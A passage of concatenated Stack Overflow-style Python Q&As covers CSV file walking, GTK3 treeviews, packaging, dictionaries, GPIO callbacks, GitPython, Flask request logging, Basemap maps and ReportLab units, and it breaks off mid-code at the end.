Question: I have been looking for some time now and I have not had any luck. Here is my issue: I have a network drive filled with folders and sub-folders of CSVs. Eventually, these CSVs need to get imported into a database. Based on the structure, there is one row (the second line of each file) that I want removed from each CSV and appended to one new file, so that those rows together form their own sheet and table. A while back I found out that Python can achieve this. However, I ran into some issues. I am doing this one step at a time, so I do not feel overwhelmed by not knowing where to start. The problem is that I find all of the CSVs, but I cannot open each one to read any lines or work on writing to a file. I have been using some other threads as resources, but ran into **IOError: [Errno 13] Permission denied: '.'** I tried to exhaust all of my options before I came here, but now I am running out of time. I would more than appreciate the help.
Here is the code; as you can see from the comments, I have been playing with it for a while:
#!/usr/bin/python
import os
import csv
import sys
#output_file = sys.argv[1]
input_path = sys.argv[1] #I would pass a '.' here for current directory on the drive
#output_file = sys.argv[2]
def doWhatYouWant(line):
print line
return line
#let the function return, not only print, to get the value for use as below
#filewriter = csv.writer(open(output_file,'wb'))
#This recursively opens opens .csv files and opens them
directory = os.path.join(input_path)
for root,dirs,files in os.walk(directory):
for file in files:
if file.endswith(".csv"):
f=open(input_path, 'r')
lines= f.readlines()
f.close()
#reader =csv.DictReader(f,delimiter=',')
# writer = open("testsummary.txt",'wb')
# writer = csv.writer(writer, delimiter=',')
f=open(file.txt,'w')
#for row in reader:
# writer.writerow(row[2])
# print(row[1])
newline=doWhatYouWant(line)
f.write(newline)
f.close()
#f.close()
#print file
Thank you all for your help in advance.
Answer: You are getting the `IOError: [Errno 13] Permission denied: '.'` exception
because you are attempting to open the current directory itself as if it were
a readable text file:
open(input_path, 'r')
Instead, you need to do something like this:
open(os.path.join(root, file), 'r')
* * *
Also consider using [`with`](https://docs.python.org/2/reference/compound_stmts.html#with) when opening files, e.g.
with open(filename, 'r') as f:
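A minimal sketch of the corrected loop, combining both points (output handling is left out, as in the question):
import os

for root, dirs, files in os.walk(input_path):
    for name in files:
        if name.endswith(".csv"):
            with open(os.path.join(root, name), 'r') as f:
                lines = f.readlines()
            # lines[1] is the second line of this CSV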
|
How to block size of last column in treeview gtk3
Question: Below is a demo treeview. I would like to fix the width of the last column. After a lot of tests with different commands, I am asking for help.
<https://andrewsteele.me.uk/learngtk.org/tutorials/python_gtk3_tutorial/html/treeviewcolumn.html>
It says: The sizing of the column can also be customised in a number of ways depending on the change in the content by using the method:
treeviewcolumn.set_sizing(sizing)
The sizing argument can be set to Gtk.TreeViewColumnSizing.GROW_ONLY, which sets the column to never shrink regardless of the content; Gtk.TreeViewColumnSizing.AUTOSIZE, which adjusts the column to be an optimal size and is updated every time the model changes; or Gtk.TreeViewColumnSizing.FIXED, which sets columns to a fixed pixel width.
With my code, however, the last column takes all the available space.
#!/usr/bin/env python3
# -*- coding: ISO-8859-1 -*-
# liststore.py
from gi.repository import Gtk,Gdk
window = Gtk.Window()
window.connect("destroy", lambda q: Gtk.main_quit())
liststore = Gtk.ListStore(str, int)
liststore.append(["Oranges", 5])
liststore.append(["Apples", 3])
liststore.append(["Bananas", 1])
liststore.append(["Tomatoes", 4])
liststore.append(["Cucumber", 1])
liststore.append(["potatoes", 10])
liststore.append(["apricot", 100])
treeview = Gtk.TreeView(model=liststore)
treeview.set_rules_hint( True )
window.add(treeview)
treeviewcolumn = Gtk.TreeViewColumn("Item")
treeview.append_column(treeviewcolumn)
cellrenderertext = Gtk.CellRendererText()
treeviewcolumn.pack_start(cellrenderertext, True)
treeviewcolumn.add_attribute(cellrenderertext, "text", 0)
treeviewcolumn = Gtk.TreeViewColumn("Quantity")
treeviewcolumn.props.sizing = Gtk.TreeViewColumnSizing.FIXED
treeview.append_column(treeviewcolumn)
cellrenderertext = Gtk.CellRendererText()
treeviewcolumn.pack_start(cellrenderertext, True)
treeviewcolumn.add_attribute(cellrenderertext, "text", 1)
css_provider = Gtk.CssProvider()
css = """
/* font operate on entire GtkTreeView not for selected row */
GtkTreeView {
text-shadow: 1px 1px 2px black, 0 0 1em blue, 0 0 0.2em blue;
color: white;
font: 1.5em Georgia, "Bitstream Charter", "URW Bookman L", "Century Schoolbook L", serif;
font-weight: bold;
font-style: italic;box-shadow: 5px 3px red;}
GtkTreeView row:nth-child(even) {
background-image: -gtk-gradient (linear,
left top,
left bottom,
from (#d0e4f7),
color-stop (0.5, darker (#d0e4f7)),
to (#fdffff));
}
GtkTreeView row:nth-child(odd) {
background-image: -gtk-gradient (linear,
left top,
left bottom,
from (yellow),
color-stop (0.5, darker (yellow)),
to (#fdffff));
}
/* next line only border action operate */
GtkTreeView:selected{color: white; background: green; border-width: 1px; border-color: black;}
/* next line for Gtk.TreeViewColumn */
column-header .button{color: white; background: purple;}
"""
css_provider.load_from_data(css)
screen = Gdk.Screen.get_default()
style_context = window.get_style_context()
style_context.add_provider_for_screen(screen, css_provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)
window.show_all()
Gtk.main()
Answer: In your case the issue is that GTK tries to fill up the space in some way; since none of the columns was set to expand, the last column expands. So in order to fix your issue, change your code as follows:
treeviewcolumn = Gtk.TreeViewColumn("Item")
treeviewcolumn.set_expand(True)
treeview.append_column(treeviewcolumn)
This tells GTK that you want the Item column to expand; by default this value is `False`, so the other columns (like the "Quantity" column) will not expand.
|
How to build a package out of a class
Question: I have written a class called editClass which works fine. The class is
completely defined in the file editClass.py. The constructor is given by:
def __init__(self,filename):
self.File=filename
I now want to build a package that only contains this class (and, in the future, other classes as well). I spent some time on Google and here searching for how exactly this works, but I have reached some kind of dead end. What I have so far are the following files:
setup.py
edit/__init__.py
edit/editClass.py
The class definition in editClass.py remained untouched and works. The __init__.py only contains `from editClass import editClass` and the setup.py is:
from setuptools import setup
setup(name='edit',
version='0.1.0',
packages=['edit'],
author='my name'
)
I installed this with $python setup.py install in the shell. This seemed to
work. In a test file test.py I want to call the constructor of editClass. But
import edit
filename= "name.txt"
test=edit.editClass(filename)
does not work. The error message is:
AttributeError: 'module' object has no attribute 'editClass'
I do not know if I referred to the constructor wrongly or if the problem is already in the installed package. To be honest, I don't even know how to check.
Edit: since `from edit import editClass` does not work either, I believe the problem is in the definition of the package.
Answer: Given your code structure, you need to change
import edit
filename= "name.txt"
test=edit.editClass(filename)
to
import edit.editClass
filename = "name.txt"
test = edit.editClass.editClass(filename)
What you've actually got is a package called `edit`, containing a module
called `editClass` containing a class called `editClass`. So your import needs
to import the module (`edit.editClass`) and you then need to qualify the class
with it's module name. Alternatively you can do
from edit.editClass import editClass
filename = "name.txt"
test = editClass(filename)
On the other hand, if what you were trying to achieve was for your client code
to look as you had it, then you need to put the `editClass` class definition
into a file called `edit.py`.
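If the goal was for `edit.editClass` to name the class directly, another option (a sketch, not part of the answer above) is to re-export it from the package's `__init__.py` with an explicit relative import, which also works on Python 3:
# edit/__init__.py
from .editClass import editClass
After reinstalling the package, `import edit` followed by `edit.editClass(filename)` works as originally intended.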
|
Reverse Dictionary. Output keeps changing
Question: So I have to write a function that receives a dictionary as input argument and
returns a reverse of the input dictionary where the values of the original
dictionary are used as keys for the returned dictionary and the keys of the
original dictionary are used as values for the returned dictionary.
For example, if the function is called as
reverse_dictionary({'Accurate': ['exact', 'precise'], 'exact': ['precise'], 'astute': ['Smart', 'clever'], 'smart': ['clever', 'bright', 'talented']})
then my function should return
{'precise': ['accurate', 'exact'], 'clever': ['astute', 'smart'], 'talented': ['smart'], 'bright': ['smart'], 'exact': ['accurate'], 'smart': ['astute']}
Here's my function
def reverse_dictionary(input_dict):
d={}
def countEmpty(dictionario):
count=0
for k,v in dictionario.items():
if(len(dictionario[k])==0):
count+=1
return count
def removo(dicto, dicto2):
for k,v in dicto.items():
#v.sort()
if (len(dicto[k])!=0):
if v[-1] not in dicto2:
dicto2[v[-1].lower()]=[k.lower()]
else:
dicto2[v[-1]].append(k.lower())
dicto[k]=v[:-1]
while countEmpty(input_dict)<len(input_dict):
removo(input_dict,d)
for k,v in d.items():
v.sort()
return d
dicta={'astute': ['Smart', 'clever', 'talented'], 'Accurate': ['exact', 'precise'], 'exact': ['precise'], 'talented': ['smart', 'keen', 'Bright'], 'smart': ['clever', 'bright', 'talented']}
print(reverse_dictionary(dicta))
The program initially works. It reverses the dictionary. But the values in the
dictionary need to be sorted. I've tested the program with:
dicta={'astute': ['Smart', 'clever', 'talented'], 'Accurate': ['exact', 'precise'], 'exact': ['precise'], 'talented': ['smart', 'keen', 'Bright'], 'smart': ['clever', 'bright', 'talented']}
And it sometimes returns:
{'keen': ['talented'], 'talented': ['astute', 'smart'], 'clever': ['astute', 'smart'], 'exact': ['accurate'], 'bright': ['smart', 'talented'], 'precise': ['accurate', 'exact'], 'smart': ['astute', 'talented']}
Which is the correct answer, but at times it also returns:
{'bright': ['smart', 'talented'], 'exact': ['accurate'], 'talented': ['astute', 'smart'], 'precise': ['accurate', 'exact'], 'clever': ['astute', 'smart'], 'smart': ['astute'], 'keen': ['talented']}
which has the 'talented' value missing from the 'smart' key, even though I have done nothing to change the code. I understand dictionaries in Python don't really have any order, but shouldn't the values be consistent? Why does this happen?
Answer: The run-to-run differences come from the case handling in `removo`: it checks `if v[-1] not in dicto2` with the original casing but inserts under `v[-1].lower()`, so depending on the (randomized) dict iteration order an already-built list such as `dicto2['smart']` can be overwritten and lose values like 'talented'.
A simpler approach: make a sorted list of tuples associating each value with its key in the original dict, then use itertools.groupby, a dict comprehension and a list comprehension to merge the output:
import itertools
d = {'accurate': ['exact', 'precise'],
'exact': ['precise'],
'astute': ['smart', 'clever'],
'smart': ['clever', 'bright', 'talented']}
l = sorted([(v2,k) for k, v in d.items() for v2 in v])
{k:list(x[1] for x in g) for k, g in itertools.groupby(l, lambda x: x[0])}
Intermediate list l:
[('bright', 'smart'),
('clever', 'astute'),
('clever', 'smart'),
('exact', 'accurate'),
('precise', 'accurate'),
('precise', 'exact'),
('smart', 'astute'),
('talented', 'smart')]
Output:
{'bright': ['smart'],
'clever': ['astute', 'smart'],
'exact': ['accurate'],
'precise': ['accurate', 'exact'],
'smart': ['astute'],
'talented': ['smart']}
|
Python exceptions and regex
Question: I have an expression which I'm using to raise exceptions in the code, except
one case where this expression is allowed:
searchexp = re.search( r'^exp1=.*, exp2=(.*),.*', line )
I want to raise an exception whenever this condition is hit except one case
when I want it to print a warning
elif searchexp:
if searchexp.group(1) == 'tag':
print("-w- just a warning that its a tag")
else:
raise Exception("-E- This is illegal to do")
In simple English
if (searchexp)
raise an Exception except if searchexp.group(1) == 'tag'
How do I do this in python?
Answer: You can do it this way: wrap every `re.search()` call with `wrap_search()`, which will check the returned match.
import warnings
def wrap_search(match):
if not match:
return
if match.group(1) == "tag":
warnings.warn("-w- just a warning that its a tag")
else:
raise Exception("-E- This is illegal to do")
return match
searchexp = wrap_search(re.search( r'^exp1=.*, exp2=(.*),.*', line ))
|
conditional frequency distribution nltk
Question: I'm a complete newbie and learning to use python using the natural language
toolkit. I have been trying to analyze a text in terms of most common words in
it. Specifically, I am trying to make a graph of the most frequent long words
(more than 6 letters) in it. Could anyone suggest how to tweak the Cumulative
Frequency Plot fdist.plot(cumulative=False) so it works only with long words?
thank you!
Answer: After tokenizing your word list, eliminate the undesired words with len() in a
list comprehension.
from nltk import word_tokenize
tokens = word_tokenize(input_string)
long_words = [x for x in tokens if len(x) > 6]  # words with more than 6 letters
Perform your analysis using this new list of tokens. Check out [this
page](http://www.nltk.org/book/ch01.html) for a more extensive explanation.
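For the plot itself, a short sketch building the frequency distribution over the filtered tokens (the cutoff of 30 words is an arbitrary choice):
from nltk import FreqDist

fdist = FreqDist(long_words)
fdist.plot(30, cumulative=False)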
|
Time between button press and release in python?
Question: I am trying to time from the start of a button press to the end of a button
press on GPIO (in order to differentiate between a long press and a short
press). I want to use a callback to get the button presses immediately and
without polling. Here is what I tried first:
import RPi.GPIO as GPIO
import time
def my_callback(channel):
start = time.time()
GPIO.add_event_detect(25, GPIO.FALLING)
end = time.time()
elapsed = end - start
print(elapsed)
GPIO.add_event_detect(25, GPIO.RISING, callback=my_callback)
#while other stuff is running
On running this program I get:
> RunTimeError: Conflicting edge detection already enabled for this GPIO
> channel.
Because I can't poll both I tried:
def my_callback(channel):
GPIO.remove_event_detect(25)
start = time.time()
GPIO.add_event_detect(25, GPIO.FALLING)
end = time.time()
elapsed = end - start
print(elapsed)
GPIO.add_event_detect(25, GPIO.RISING, callback=my_callback)
This worked once but was not repeatable because I am removing the event
detection and redefining it. Thus I tried to restore the event detect in the
callback:
def my_callback(channel):
GPIO.remove_event_detect(25)
start = time.time()
GPIO.add_event_detect(25, GPIO.FALLING)
end = time.time()
elapsed = end - start
print(elapsed)
GPIO.remove_event_detect(25)
GPIO.add_event_detect(25, GPIO.RISING, callback=my_callback)
GPIO.add_event_detect(25, GPIO.RISING, callback=my_callback)
This finally worked, but will crash my pi quickly, as I think I created a
loop-back. Is there another way to accomplish this that I am overlooking?
Answer: Thanks to jDo, here is the code that works:
def my_callback(channel):
global start
global end
if GPIO.input(25) == 1:
start = time.time()
if GPIO.input(25) == 0:
end = time.time()
elapsed = end - start
print(elapsed)
GPIO.add_event_detect(25, GPIO.BOTH, callback=my_callback, bouncetime=200)
|
Provide a password for the "git push" command in GitPython
Question: In Python, using [GitPython](https://github.com/gitpython-
developers/GitPython), I need to `git push` to a HTTPS remote repository on
BitBucket.
After running the `repo.git.push()` command, it will return _-as expected-_ :
> bash: /dev/tty: No such device or address
>
> error: failed to execute prompt script (exit code 1)
>
> fatal: could not read Password for '<https://[email protected]>':
> Invalid argument'
But Python will give me no chance to enter the password as in the console.
**How can I "attach" the password to the `git push` command, or how can I simulate a console password entry in Python?**
_It is important to note that unfortunately using SSH is **not** an alternative (the script should not require any further action from the user who receives it and wants to `git push`). I'm looking to "attach" the password to the command or to "simulate" a text entry for it._
Answer: **What you are attempting to do is skirt past security.**
You need to create a pair of ssh keys.
Then, log-on to your bitbucket account's website and upload your public key.
Store your keys in your `~/.ssh` directory.
When you have your keys setup you will not be prompted for a password anymore.
Here is more information about working with SSH keys:
<https://help.github.com/articles/generating-an-ssh-key/>
|
Looking to find specific phrases in file using Python
Question: I am aware that there are some quite similar posts about this on the forum but
I need this for a quick scan of a text file. I have to run 500 checks through
a 1 GB file and print out lines that contain certain phrases, here is my code:
import re
with open('text.txt', 'r') as f:
searchstrings = ('aaAa','bBbb')
for line in f.readlines():
for word in searchstrings:
word2 = ".*" + word + ".*"
match = re.search(word2, line)
if match:
print word + " " + line
I was trying to make it return any line containing those phrases, so even if
the line was "BBjahdAAAAmm" I wanted it returned because it has aaaa in it.
aaAa and bBbb are just examples, the list is completely different.
Answer: Don't use `f.readlines()`; you'll be loading the whole 1 GB into memory. Read the lines one at a time instead:
searchstrings = ('aaAa','bBbb')
with open('text.txt', 'r') as f:
for line in f:
for word in searchstrings:
if word.lower() in line.lower():
print word + " " + line
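With 500 phrases, it may also be worth compiling them into a single case-insensitive alternation up front instead of testing each phrase per line; a rough sketch (the two phrases stand in for the real list):
import re

searchstrings = ('aaAa', 'bBbb')   # stand-ins for the real 500 phrases
pattern = re.compile("|".join(re.escape(s) for s in searchstrings), re.IGNORECASE)

with open('text.txt', 'r') as f:
    for line in f:
        match = pattern.search(line)   # one scan per line instead of 500
        if match:
            print match.group(0) + " " + line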
|
Python path.exists and path.join
Question: Python 2.7: Struggling a little with path.exists
import os
import platform
OS = platform.system()
CPU_ARCH = platform.machine()
if os.path.exists( os.path.join("/dir/to/place/" , CPU_ARCH) ):
print "WORKED"
# Linux
LD_LIBRARY_PATH = "/dir/to/place/" + CPU_ARCH
TRANSCODER_DIR = LD_LIBRARY_PATH + "/Resources/"
else:
print "FAILED"
    #fall back to the original directory if the processor is not recognised
TRANSCODER_DIR = "/dir/to/place/Resources/"
LD_LIBRARY_PATH = "/dir/to/place"
As soon as I use os.path.join with a variable inside it, the if statement fails.
os.path.exists("/dir/to/place/arch")
returns TRUE
os.path.exists("/dir/to/place/" + CPU_ARCH)
returns FALSE
I have tried many variations on the different path and string commands; none of them let me build this path with a variable.
os.path.join("/dir/to/place/", CPU_ARCH)
returns /dir/to/place/arch
It's not a permissions issue either; full permissions are granted, and I've tested using the Python CLI on its own with the same result.
I've looked at all the Stack Overflow posts for the same issue, and the only response that someone says has worked is to strip the whitespace. I'm pretty new to Python, but I don't see any whitespace here.
Answer: `os.path.exists` checks if a path exists.
If `/dir/to/place/arch` exists, then
os.path.exists("/dir/to/place/" + CPU_ARCH)
should return True. **Notice the trailing `/` after `place` that is missing in your example.**
`os.path.join` will join all its arguments to create a path.
# This joins the two arguments into one path
os.path.join("/dir/to/place/", CPU_ARCH)
# >>> '/dir/to/place/x86_64'
This should explain the results you are seeing.
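If the joined path still returns False for you, a quick diagnostic sketch to rule out hidden whitespace in `CPU_ARCH` (printing `repr()` exposes stray spaces or newlines); the directory names are placeholders from the question:
import os
import platform

CPU_ARCH = platform.machine()
print(repr(CPU_ARCH))                                   # repr() shows stray spaces/newlines
print(repr(os.path.join("/dir/to/place/", CPU_ARCH)))
print(os.path.exists(os.path.join("/dir/to/place/", CPU_ARCH.strip())))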
|
Bypass Referral Denied error in selenium using python
Question: I was making a script to download images from Comic Naver and I'm mostly done with it; however, I can't seem to save the images. I successfully grabbed the images via urllib and BeautifulSoup, but now it seems they've introduced hotlink blocking and I can't save the images on my system via urllib or Selenium.
Update: I tried changing the useragent to see if that was causing problems...
still the same.
Any fix or solution?
My code right now :
import requests
from bs4 import BeautifulSoup
import re
import urllib
import urllib2
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
dcap = dict(DesiredCapabilities.PHANTOMJS)
dcap["phantomjs.page.settings.userAgent"] = (
"Chrome/15.0.87"
)
url = "http://comic.naver.com/webtoon/detail.nhn?titleId=654817&no=44&weekday=tue"
driver = webdriver.PhantomJS(desired_capabilities=dcap)
soup = BeautifulSoup(urllib.urlopen(url).read())
scripts = soup.findAll('img', alt='comic content')
for links in scripts:
Imagelinks = links['src']
filename = Imagelinks.split('_')[-1]
print 'Downloading Image : '+filename
driver.get(Imagelinks)
driver.save_screenshot(filename)
driver.close()
Following 'MAI's' reply, I tried what I could with selenium, and got what I
wanted. It's solved now. My code :
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.common.exceptions import TimeoutException
from bs4 import BeautifulSoup
from selenium.webdriver.common.action_chains import ActionChains
driver = webdriver.Chrome()
url = "http://comic.naver.com/webtoon/detail.nhn?titleId=654817&no=44&weekday=tue"
driver.get(url)
elem = driver.find_elements_by_xpath("//div[@class='wt_viewer']//img[@alt='comic content']")
for links in elem:
print links.get_attribute('src')
driver.quit()
But when I try to take screenshots of this, it says that the "element is not attached to the page". Now, how am I supposed to solve that? :/
Answer: I took a short look at the website with Chrome dev tools.
I would suggest downloading the images directly instead of taking screenshots.
Selenium WebDriver should actually run the JavaScript in the PhantomJS headless browser, so you should get the images loaded by JavaScript at the following path.
The path that I am getting by eye-balling the html is
> html body #wrap #container #content div #comic_view_area div img
The image tags in the last level have IDs like `content_image_N`, `N` counting
from 0. So you can also get specific picture by using `img#content_image_0`
for example.
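Since hotlink blocking is usually based on the `Referer` header, a hedged sketch of downloading one image directly with `requests`, sending the comic page as the referer; the image URL shown is a placeholder for a real `src` taken from the page:
import requests

page_url = "http://comic.naver.com/webtoon/detail.nhn?titleId=654817&no=44&weekday=tue"
img_url = "http://example.invalid/IMAGE_URL_FROM_IMG_SRC"   # placeholder image URL

headers = {"Referer": page_url, "User-Agent": "Mozilla/5.0"}
resp = requests.get(img_url, headers=headers)

filename = img_url.split('_')[-1]
with open(filename, "wb") as f:
    f.write(resp.content)          # raw image bytes, no screenshot needed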
|
Changing all occurences of similar word in csv python
Question: I want to replace one specific word, 'my', with 'your', but it seems my code can only change one occurrence.
import csv
path1 = "/home/bankdata/levelout.csv"
path2 = "/home/bankdata/leveloutmodify.csv"
in_file = open(path1,"rb")
reader = csv.reader(in_file)
out_file = open(path2,"wb")
writer = csv.writer(out_file)
with open(path1, 'r') as csv_file:
csvreader = csv.reader(csv_file)
col_count = 0
for row in csvreader:
while row[col_count] == 'my':
print 'my is used'
row[col_count] = 'your'
#writer.writerow(row[col_count])
writer.writerow(row)
col_count +=1
let's say the sentences is
'my book is gone and my bag is missing'
the output is
your book is gone and my bag is missing
The second thing is that I want the output to appear without commas:
print row
the output is
your,book,is,gone,and,my,bag,is,missing,
Answer: For the second problem, I'm still trying to find the correct approach, as it keeps giving me the same comma-separated output.
with open(path1) as infile, open(path2, "w") as outfile:
for row in infile:
outfile.write(row.replace(",", ""))
print row
it gives me the result:
your,book,is,gone,and,my,bag,is,missing
I send this sentence to my Nao robot and it pronounces the words awkwardly because there are commas between each word.
I solved it by:
with open(path1) as infile, open(path2, "w") as outfile:
for row in infile:
outfile.write(row.replace(",", ""))
with open(path2) as out:
for row in out:
print row
It gives me what I want:
your book is gone and your bag is missing too
However, is there a better way to do it?
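One way to do both steps in a single pass might look like this (a sketch that assumes each CSV cell holds one word, as in the example sentence):
import csv

path1 = "/home/bankdata/levelout.csv"
path2 = "/home/bankdata/leveloutmodify.csv"

with open(path1, "rb") as infile, open(path2, "wb") as outfile:
    for row in csv.reader(infile):
        # replace every occurrence of 'my', then join the cells with spaces
        words = ["your" if word == "my" else word for word in row]
        outfile.write(" ".join(words) + "\n")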
|
Debugging a request/response in Python flask
Question: I am new to [python2 flask](http://flask.pocoo.org/) and I am tasked with pretty-printing and saving the entire HTTP request and response to a file. I don't quite understand how to print/inspect the request object, let alone the response.
from flask import Flask, request
app = Flask(__name__)
@app.route('/')
def hi():
print (request)
return 'oh hai'
if __name__ == '__main__':
app.run(debug=True)
Any tips? Each request/response should be one file.
Answer: Using
[**after_request**](http://flask.pocoo.org/docs/0.10/api/#flask.Flask.after_request)
@app.after_request
def after(response):
# todo with response
print response.status
print response.headers
print response.get_data()
return response
Also, to deal with the request, use
[**before_request**](http://flask.pocoo.org/docs/0.10/api/#flask.Flask.before_request)
@app.before_request
def before():
# todo with request
# e.g. print request.headers
pass
## Edit:
`response.get_data()` returns the body of the response, and `response` is the whole response object, so you can fetch anything you want from it.
## Update for some specific url (based on
<http://s.natalian.org/2016-03-19/foo.py>):
from __future__ import print_function
from flask import Flask, request, g
import time
app = Flask(__name__)
@app.route('/')
def hi():
g.fn = str(time.time()) + ".txt"
with open(g.fn,'w') as f:
print ("Request headers", request.headers, file=f)
return 'oh hai'
@app.route('/foo')
def foo():
return 'foo'
@app.before_request
def before():
pass
@app.after_request
def after(response):
fn = g.get('fn', None)
if fn:
with open(fn,'a') as f:
print ("Printing response", file=f)
print (response.status, file=f)
print (response.headers, file=f)
print (response.get_data(), file=f)
return response
if __name__ == '__main__':
app.run(debug=True)
|
Easiest way to plot data on country map with python
Question: Could not delete question. Please refer to question: [Shade states of a
country according to dictionary values with
Basemap](http://stackoverflow.com/questions/36118998/shade-states-of-a-
country-according-to-dictionary-values-with-basemap)
I want to plot data (number of sick people for a certain year) on each state
of Mexico. I am using jupyter notebook. So far I have seen several options and
tutorials, but none seem to seem to explicitly explain how to plot the map of
a country. Below I explain some options/tutorial I have seen and why they have
not worked (this I do just to argue that tutorials are not very straight
forward):
1. Bokeh (<http://bokeh.pydata.org/en/latest/docs/gallery/texas.html>). In the tutorial texas state is plotted given that us_counties is in bokeh.sampledata. However I have not found other countries in the sampledata.
2. mpl_toolkits.basemap (<http://www.geophysique.be/2011/01/27/matplotlib-basemap-tutorial-07-shapefiles-unleached/>). Although I am able to import shapefile, I cannot run `from shapefile import ShapeFile` (ImportError: cannot import name ShapeFile). Furthermore I have not been able to download dbflib library.
3. Vincent ([Why Python Vincent map visuzalization does not map data from Data Frame?](http://stackoverflow.com/questions/32649494/why-python-vincent-map-visuzalization-does-not-map-data-from-data-frame)) When I run the code from the answer in said tutorial no image appears (even though I used command `vincent.core.initialize_notebook()` ).
4. Plotly (<https://plot.ly/python/choropleth-maps/>). The tutorial plots the map of USA importing information from a csv table (no information of other countries available). If wanting to plot another country, would it be possible to make the table?
Having explored these 4 options, I have found the tutorials not very clear or easy to follow. I find it hard to believe that plotting a map of a country is difficult in Python. I think there must be an easier way than the ones explained in the tutorials above.
The question is: Which is the easiest (hopefully simple) way to plot the map
of a certain country (any) with python and how?
I have installed the following packages: matplotlib, pyshp,
mpl_toolkits.basemap, bokeh, pandas, numpy. I have also downloaded Mexico's
map from <http://www.gadm.org/>
Thanks in advance.
Answer: While this question seems to be unanswerable in its current form, I'll at least note that you seem to be doing something wrong when using Basemap: you don't want to import ShapeFile, but simply read the shapefile using the `readshapefile` method of a `Basemap` object like so:
m = Basemap(projection='tmerc')
m.readshapefile("/path/to/your/shapefile", "mexican_states")
You will then be able to access the coordinates of each state's boundaries via
`m.mexican_states` (as a list of arrays) and the corresponding information
(such as names, maybe an identifying code) via `m.mexican_states_info`. You
will then need some sort of dict or DataFrame containing names/codes for
states (corresponding to what is in `m.mexican_states_info`) and the values
you want to plot. A simple example would work something like this, assuming
that you have a dict called `mexican_states_sick_people` that looks something
like `{"Mexico City":123, "Chiapas":35, ...}`:
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.collections import PatchCollection
from mpl_toolkits.basemap import Basemap
from shapely.geometry import Polygon
from descartes import PolygonPatch
fig, ax = plt.subplots()
# Set up basemap and read in state shapefile (this will draw all state boundaries)
m = Basemap(projection='tmerc')
m.readshapefile("/path/to/your/shapefile", "mexican_states")
# Get maximum number of sick people to calculate shades for states based on relative number
max_sick = np.max(mexican_states_sick_people.values())
# Loop through the states contained in shapefile, attaching a PolygonPatch for each of them with shade corresponding to relative number of sick people
state_patches = []
for coordinates, state in zip(m.mexican_states, m.mexican_states_info):
if state["State_name"] in mexican_states_sick_people.keys():
shade = mexican_states_sick_people[state["State_name"]]/max_sick
        state_patches.append(PolygonPatch(Polygon(coordinates), fc="darkred", ec='#555555', lw=.2, alpha=shade, zorder=4))
# Put PatchCollection of states on the map
ax.add_collection(PatchCollection(state_patches, match_original=True))
This example should be more or less functional, if you have a working
shapefile of states and make sure that the dataset of sick people you have has
some sort of identifier (name or code) for each state that allows you to match
up the numbers with the identifier of states in the shapefile (this is what
the `shade = ...` line in the loop relies upon - in the example I'm accessing
the vals in the dictionary using a name from the shapefile as key).
Hope this helps, good luck!
|
Continued Fractions Python
Question: I am new to Python and was asked to create a program that would take an input
as a non-negative integer n and then compute an approximation for the value of
e using the first n + 1 terms of the continued fraction:
I have attempted to decipher the question but can't exactly understand
everything it is asking. I am not looking for an exact answer but hopefully an
example to help me on my way.
[This is the exact question](http://i.stack.imgur.com/5zbsz.jpg)
Below is a code I have done with continued fractions before.
import math
# Get x from user
x = float(input("Enter x = "))
# Calculate initial variables and print
a0 = x//1
r0 = x-a0
print("a0 =", a0, "\tr0 =", r0)
# Calculate ai and ri for i = 1,2,3 and print results
a1 = 1/r0//1
r1 = 1/r0 - a1
print("a1 =", a1, "\tr1 =", r1)
a2 = 1/r1//1
r2 = 1/r1 - a2
print("a2 =", a2, "\tr2 =", r2)
a3 = 1/r2//1
r3 = 1/r2 - a3
print("a3 =", a3, "\tr3 =", r3)
Answer: The value e can be expressed as the limit of the following continued fraction:
> e = 2 + 1 / (1 + 1 / (2 + 2 / (3 + 3 / (4 + 4 / (...)))))
The initial `2 + 1 /` falls outside of the main pattern, but after that it
just continues as shown. Your job is to evaluate this up to `n` deep, at which
point you stop and return the value up to that point.
Make sure you carry out the calculation in floating point.
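A rough sketch of that evaluation, working from the innermost truncated level outward; exactly how the assignment maps `n` onto the truncation depth (and the `n >= 1` assumption) is a guess here:
def approx_e(n):
    # innermost level: the term "n + n / (...)" with its tail dropped; assumes n >= 1
    value = float(n)
    for k in range(n - 1, 0, -1):
        value = k + k / value      # each level has the form k + k / (next level)
    return 2.0 + 1.0 / value       # the leading "2 + 1 / (...)" from the formula

print(approx_e(10))                # approaches 2.718281828...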
|
Python Reportlab units, cm and inch, are translated differently
Question: If I draw two PDF files with ReportLab (vers. 3.2.0) with either cm or inch
settings I get two different PDFs.
I have two functions that to me look exactly equal. In one I place the text
into position (5.0*inch, 10.0*inch) and in the other I place them in
(5.0*2.54*cm, 10.0*2.54*cm). Obviously, I use 2.54 to translate the lengths
from inches to centimeters.
The problem is that the text gets placed in different positions. Am I missing
something, is this a bug or what's going on?
Below I have added the code that replicates my problem as well as pictures of
the two outcomes.
from reportlab.pdfgen import canvas
from reportlab.lib.units import inch, cm
from reportlab.lib.pagesizes import A4
def cm_test():
c = canvas.Canvas("inch.pdf", pagesize=A4)
c.translate(inch, inch)
text_object = c.beginText(5.0*inch, 10.0*inch)
text_object.textLine("INCH: text located here")
c.drawText(text_object)
c.save()
def inch_test():
c = canvas.Canvas("cm.pdf", pagesize=A4)
c.translate(cm, cm)
text_object = c.beginText(5.0*2.54*cm, 10.0*2.54*cm)
text_object.textLine("CM: text located here")
c.drawText(text_object)
c.save()
if __name__ == "__main__":
cm_test()
inch_test()
[Pic 1: Outcome of function cm_test()](http://i.stack.imgur.com/XC10n.png)
[Pic 2: Outcome of function inch_test()](http://i.stack.imgur.com/nk4z1.png)
Answer: This is not a bug; the reason the text is printed at different places is the following lines:
c.translate(inch, inch)
c.translate(cm, cm)
These statements move the canvas origin up and to the right by 1 inch and 1 cm respectively. Since ReportLab draws relative to this origin, the text is placed at different positions.
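In other words, to make the two files match, translate by the same physical distance in both. A minimal sketch of a corrected cm version (the output filename is arbitrary):
from reportlab.pdfgen import canvas
from reportlab.lib.units import cm
from reportlab.lib.pagesizes import A4

def cm_test_fixed():
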